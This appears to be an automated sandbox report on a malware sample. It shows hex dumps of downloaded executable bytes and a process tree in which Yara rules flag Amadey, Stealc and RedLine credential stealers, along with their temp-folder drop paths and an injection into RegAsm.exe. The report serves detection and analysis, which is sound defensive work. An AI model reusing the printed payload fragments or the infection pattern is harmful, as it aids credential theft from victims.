                                                      2024-09-24 13:37:47 UTC16384INData Raw: 30 58 88 06 85 db 7c 3f b8 e8 03 00 00 7f 04 3b c8 72 16 6a 00 50 53 51 e8 23 aa 00 00 04 30 89 55 e4 88 06 46 3b f7 75 0b 85 db 7c 1a 7f 05 83 f9 64 72 13 6a 00 6a 64 53 51 e8 01 aa 00 00 04 30 89 55 e4 88 06 46 3b f7 75 0b 85 db 7c 1a 7f 05 83 f9 0a 72 13 6a 00 6a 0a 53 51 e8 df a9 00 00 04 30 89 55 e4 88 06 46 6a 30 58 02 c8 33 ff 88 0e c6 46 01 00 80 7d dc 00 74 0a 8b 4d d0 83 a1 50 03 00 00 fd 8b c7 5f 5e 5b 8b e5 5d c3 8b ff 55 8b ec 83 ec 0c 8d 45 f4 56 8b 75 1c 57 ff 75 18 ff 75 14 8d 7e 01 50 8b 45 08 57 ff 70 04 ff 30 e8 87 4f 00 00 83 c9 ff 83 c4 18 39 4d 10 74 17 8b 4d 10 33 c0 83 7d f4 2d 0f 94 c0 2b c8 33 c0 85 f6 0f 9f c0 2b c8 8d 45 f4 50 57 8b 7d 0c 51 33 c9 83 7d f4 2d 0f 94 c1 33 c0 85 f6 0f 9f c0 03 cf 03 c1 50 e8 aa 49 00 00 83 c4 10
                                                      Data Ascii: 0X|?;rjPSQ#0UF;u|drjjdSQ0UF;u|rjjSQ0UFj0X3F}tMP_^[]UEVuWuu~PEWp0O9MtM3}-+3+EPW}Q3}-3PI
                                                      2024-09-24 13:37:47 UTC16384INData Raw: 6a 00 e8 2c d9 ff ff 59 c3 8b ff 55 8b ec 8b 4d 08 33 c0 f6 c1 10 74 05 b8 80 00 00 00 53 56 57 bf 00 02 00 00 f6 c1 08 74 02 0b c7 f6 c1 04 74 05 0d 00 04 00 00 f6 c1 02 74 05 0d 00 08 00 00 f6 c1 01 74 05 0d 00 10 00 00 be 00 01 00 00 f7 c1 00 00 08 00 74 02 0b c6 8b d1 bb 00 03 00 00 23 d3 74 1f 3b d6 74 16 3b d7 74 0b 3b d3 75 13 0d 00 60 00 00 eb 0c 0d 00 40 00 00 eb 05 0d 00 20 00 00 ba 00 00 00 03 5f 23 ca 5e 5b 81 f9 00 00 00 01 74 18 81 f9 00 00 00 02 74 0b 3b ca 75 11 0d 00 80 00 00 5d c3 83 c8 40 5d c3 0d 40 80 00 00 5d c3 8b ff 55 8b ec 83 ec 0c dd 7d fc db e2 83 3d bc 9d 43 00 01 0f 8c 83 00 00 00 66 8b 45 fc 33 c9 8b d1 57 bf 00 00 08 00 a8 3f 74 29 a8 01 74 03 6a 10 5a a8 04 74 03 83 ca 08 a8 08 74 03 83 ca 04 a8 10 74 03 83 ca 02 a8 20 74
                                                      Data Ascii: j,YUM3tSVWttttt#t;t;t;u`@ _#^[tt;u]@]@]U}=CfE3W?t)tjZttt t
                                                      2024-09-24 13:37:47 UTC16384INData Raw: 83 c4 08 85 c0 74 d9 3b df 72 2f 8b b5 00 ff ff ff 2b fa 3b bd fc fe ff ff 76 19 53 57 8b ce ff 15 94 01 42 00 ff d6 8b 95 04 ff ff ff 83 c4 08 85 c0 74 dd 8b b5 f4 fe ff ff 8b 95 08 ff ff ff 8b c7 8b 9d fc fe ff ff 8b ca 2b ce 2b c3 3b c1 7c 39 3b df 73 18 8b 85 f8 fe ff ff 89 9c 85 0c ff ff ff 89 7c 85 84 40 89 85 f8 fe ff ff 8b bd 04 ff ff ff 3b f2 73 4c 8b ce 8b b5 00 ff ff ff 89 8d fc fe ff ff e9 6a fd ff ff 3b f2 73 18 8b 85 f8 fe ff ff 89 b4 85 0c ff ff ff 89 54 85 84 40 89 85 f8 fe ff ff 8b 8d fc fe ff ff 8b b5 00 ff ff ff 3b cf 73 15 8b d7 8b bd 04 ff ff ff e9 2b fd ff ff 8b b5 00 ff ff ff eb 06 8b bd 04 ff ff ff 8b 85 f8 fe ff ff 83 e8 01 89 85 f8 fe ff ff 78 16 8b 8c 85 0c ff ff ff 8b 54 85 84 89 8d fc fe ff ff e9 f6 fc ff ff 5b 8b 4d fc 5f 33
                                                      Data Ascii: t;r/+;vSWBt++;|9;s|@;sLj;sT@;s+xT[M_3
                                                      2024-09-24 13:37:47 UTC16384INData Raw: 53 74 72 69 6e 67 0a 00 50 79 45 72 72 5f 43 6c 65 61 72 00 46 61 69 6c 65 64 20 74 6f 20 67 65 74 20 61 64 64 72 65 73 73 20 66 6f 72 20 50 79 45 72 72 5f 43 6c 65 61 72 0a 00 00 50 79 45 72 72 5f 4f 63 63 75 72 72 65 64 00 00 46 61 69 6c 65 64 20 74 6f 20 67 65 74 20 61 64 64 72 65 73 73 20 66 6f 72 20 50 79 45 72 72 5f 4f 63 63 75 72 72 65 64 0a 00 00 00 50 79 45 72 72 5f 50 72 69 6e 74 00 46 61 69 6c 65 64 20 74 6f 20 67 65 74 20 61 64 64 72 65 73 73 20 66 6f 72 20 50 79 45 72 72 5f 50 72 69 6e 74 0a 00 00 50 79 49 6d 70 6f 72 74 5f 41 64 64 4d 6f 64 75 6c 65 00 00 46 61 69 6c 65 64 20 74 6f 20 67 65 74 20 61 64 64 72 65 73 73 20 66 6f 72 20 50 79 49 6d 70 6f 72 74 5f 41 64 64 4d 6f 64 75 6c 65 0a 00 00 00 50 79 49 6d 70 6f 72 74 5f 45 78 65 63 43 6f
                                                      Data Ascii: StringPyErr_ClearFailed to get address for PyErr_ClearPyErr_OccurredFailed to get address for PyErr_OccurredPyErr_PrintFailed to get address for PyErr_PrintPyImport_AddModuleFailed to get address for PyImport_AddModulePyImport_ExecCo
                                                      2024-09-24 13:37:47 UTC16384INData Raw: 65 6c 65 74 65 5b 5d 20 63 6c 6f 73 75 72 65 27 00 00 00 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 60 6d 61 6e 61 67 65 64 20 76 65 63 74 6f 72 20 64 65 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 00 60 65 68 20 76 65 63 74 6f 72 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 00 00 60 65 68 20 76 65 63 74 6f 72 20 76 62 61 73 65 20 63 6f 70 79 20 63 6f 6e 73 74 72 75 63 74 6f 72 20 69 74 65 72 61 74 6f 72 27 00 60 64 79 6e 61 6d 69 63 20 69 6e 69 74 69 61 6c 69 7a 65 72 20 66 6f 72 20 27 00 00 60 64 79 6e 61 6d 69 63 20 61 74 65 78 69 74 20 64 65 73 74 72 75 63 74 6f 72 20 66 6f 72 20 27 00 00 00 00 60 76 65 63 74 6f 72
                                                      Data Ascii: elete[] closure'`managed vector constructor iterator'`managed vector destructor iterator'`eh vector copy constructor iterator'`eh vector vbase copy constructor iterator'`dynamic initializer for '`dynamic atexit destructor for '`vector


                                                      Statistics

                                                      CPU Usage

                                                      Click to jump to process

                                                      Memory Usage

                                                      Click to jump to process

                                                      High Level Behavior Distribution

                                                      Click to dive into process behavior distribution

                                                      Behavior

                                                      Click to jump to process

                                                      System Behavior

                                                      General

                                                      Target ID:6
                                                      Start time:09:33:42
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\Desktop\file.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                      Imagebase:0xda0000
                                                      File size:1'936'896 bytes
                                                      MD5 hash:604496F01BE7B778D8A564C57677D644
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000002.1318437657.0000000000DA1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.1277581266.0000000004950000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:8
                                                      Start time:09:33:46
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe"
                                                      Imagebase:0xdb0000
                                                      File size:1'936'896 bytes
                                                      MD5 hash:604496F01BE7B778D8A564C57677D644
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.1352623579.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.1312296599.0000000005450000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 47%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:11
                                                      Start time:09:34:00
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                      Imagebase:0xdb0000
                                                      File size:1'936'896 bytes
                                                      MD5 hash:604496F01BE7B778D8A564C57677D644
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000003.1452499164.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000B.00000002.3756294497.0000000000DB1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:13
                                                      Start time:11:33:10
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe"
                                                      Imagebase:0x200000
                                                      File size:1'835'520 bytes
                                                      MD5 hash:D512CD419C532FC7D6C3A5C6C4A303A3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000D.00000003.1600953137.0000000004AB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000D.00000002.1971865363.0000000000201000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000D.00000002.1976198696.0000000000F7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000D.00000002.1971865363.000000000029A000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:14
                                                      Start time:11:33:14
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\1000015002\b74664dd7e.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\1000015002\b74664dd7e.exe"
                                                      Imagebase:0x540000
                                                      File size:1'835'520 bytes
                                                      MD5 hash:D512CD419C532FC7D6C3A5C6C4A303A3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000002.2586371888.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000003.1644238090.0000000004F00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000002.2583706589.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000E.00000002.2583706589.00000000005DA000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:15
                                                      Start time:11:33:25
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe"
                                                      Imagebase:0x200000
                                                      File size:1'835'520 bytes
                                                      MD5 hash:D512CD419C532FC7D6C3A5C6C4A303A3
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000F.00000002.2352900147.0000000000D88000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000F.00000002.2350817392.0000000000201000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000F.00000003.1756168232.0000000004C60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:17
                                                      Start time:11:33:29
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\1000019101\6dbb7bdf47.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\1000019101\6dbb7bdf47.exe"
                                                      Imagebase:0xdf0000
                                                      File size:921'600 bytes
                                                      MD5 hash:5D8D57A3729CFBBABA4E3E60D6BEF3D8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:19
                                                      Start time:11:33:34
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\1000015002\b74664dd7e.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\1000015002\b74664dd7e.exe"
                                                      Imagebase:0x540000
                                                      File size:1'835'520 bytes
                                                      MD5 hash:D512CD419C532FC7D6C3A5C6C4A303A3
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000013.00000002.2669801518.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000013.00000003.1841769125.0000000004A70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000013.00000002.2673207759.0000000000FAB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:21
                                                      Start time:11:33:34
                                                      Start date:24/09/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7672 -s 1512
                                                      Imagebase:0x70000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:23
                                                      Start time:11:33:41
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\1000020001\610cd559ac.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\1000020001\610cd559ac.exe"
                                                      Imagebase:0xe0000
                                                      File size:1'873'408 bytes
                                                      MD5 hash:6A6234CE6830B57E0F1FA2E728E7E8D1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000002.1925680641.00000000000E1000.00000040.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000017.00000003.1885515437.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:26
                                                      Start time:11:33:42
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\1000002001\3ec4738210.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\1000002001\3ec4738210.exe"
                                                      Imagebase:0x200000
                                                      File size:1'835'520 bytes
                                                      MD5 hash:D512CD419C532FC7D6C3A5C6C4A303A3
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001A.00000002.2280696293.0000000000201000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001A.00000002.2284052492.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001A.00000003.1942187223.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001A.00000002.2280696293.000000000029A000.00000040.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:27
                                                      Start time:11:33:45
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                      Imagebase:0x6f0000
                                                      File size:1'873'408 bytes
                                                      MD5 hash:6A6234CE6830B57E0F1FA2E728E7E8D1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000002.3749392978.00000000006F1000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001B.00000003.1945297773.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      General

                                                      Target ID:28
                                                      Start time:11:33:45
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      Imagebase:0x6f0000
                                                      File size:1'873'408 bytes
                                                      MD5 hash:6A6234CE6830B57E0F1FA2E728E7E8D1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000002.1987821507.00000000006F1000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001C.00000003.1946658901.0000000005320000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:29
                                                      Start time:11:33:51
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\1000015002\b74664dd7e.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\1000015002\b74664dd7e.exe"
                                                      Imagebase:0x540000
                                                      File size:1'835'520 bytes
                                                      MD5 hash:D512CD419C532FC7D6C3A5C6C4A303A3
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001D.00000002.2790303131.0000000000541000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001D.00000002.2792862379.000000000122B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000001D.00000003.2010739525.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:30
                                                      Start time:11:34:00
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      Imagebase:0x6f0000
                                                      File size:1'873'408 bytes
                                                      MD5 hash:6A6234CE6830B57E0F1FA2E728E7E8D1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000003.2089661467.0000000004EE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000001E.00000002.2132345556.00000000006F1000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:31
                                                      Start time:11:34:02
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\1000002001\gold.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\1000002001\gold.exe"
                                                      Imagebase:0x3b0000
                                                      File size:320'000 bytes
                                                      MD5 hash:389881B424CF4D7EC66DE13F01C7232A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000001F.00000002.2104172556.0000000003775000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, ReversingLabs
                                                      Reputation:low
                                                      Has exited:true

                                                      General

                                                      Target ID:32
                                                      Start time:11:34:03
                                                      Start date:24/09/2024
                                                      Path:C:\Windows\System32\conhost.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                      Imagebase:0x7ff75da10000
                                                      File size:862'208 bytes
                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:33
                                                      Start time:11:34:03
                                                      Start date:24/09/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                      Imagebase:0xdf0000
                                                      File size:65'440 bytes
                                                      MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000021.00000002.2737248313.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000021.00000002.2744975325.0000000003274000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000021.00000002.2744975325.000000000331C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:36
                                                      Start time:11:34:15
                                                      Start date:24/09/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1500
                                                      Imagebase:0x70000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:39
                                                      Start time:11:34:49
                                                      Start date:24/09/2024
                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7812 -s 1512
                                                      Imagebase:0x70000
                                                      File size:483'680 bytes
                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      General

                                                      Target ID:41
                                                      Start time:11:35:00
                                                      Start date:24/09/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
                                                      Imagebase:0x6f0000
                                                      File size:1'873'408 bytes
                                                      MD5 hash:6A6234CE6830B57E0F1FA2E728E7E8D1
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000029.00000003.2690915985.0000000004E50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000029.00000002.2741378839.00000000006F1000.00000040.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:true

                                                      Disassembly

                                                      Reset < >

                                                        Executed Functions

                                                        Function 04B20892 Relevance: .1, Instructions: 55COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1320712726.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_4b20000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fc2490f5cdf0bd58115a0ba07e298531ec79ce015d0d128095159df64dd3e403
                                                        • Instruction ID: 3cc0ec01f05bb1a52f951de9835bd3ccdb54af3a3aeca4558c7be4101cc6b287
                                                        • Opcode Fuzzy Hash: fc2490f5cdf0bd58115a0ba07e298531ec79ce015d0d128095159df64dd3e403
                                                        • Instruction Fuzzy Hash: 94F08CEB24D1307DB082A0863F24AF7676DE4D377133185A7F647C6442E1890A8DB271
                                                        Function 04B207AA Relevance: .2, Instructions: 153COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1320712726.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_4b20000_file.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6d7e93ec209269be8dccd7eaac1cca2784ac39c29410e3649c6f537d685f7d0b
                                                        • Instruction ID: 15f2ad7abb793bc848fbf5698d16855d4fd8fcd67c710d9f21c78788f276b312
                                                        • Opcode Fuzzy Hash: 6d7e93ec209269be8dccd7eaac1cca2784ac39c29410e3649c6f537d685f7d0b
                                                        • Instruction Fuzzy Hash: FA31F7E720C2607FB242E1957B64AF77B6DEAC673033084A7F54ADB102F2951A49A631
                                                        Function 04B20793 Relevance: .1, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1320712726.0000000004B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B20000, based on PE: false
                                                        Joe Sandbox IDA Plugin
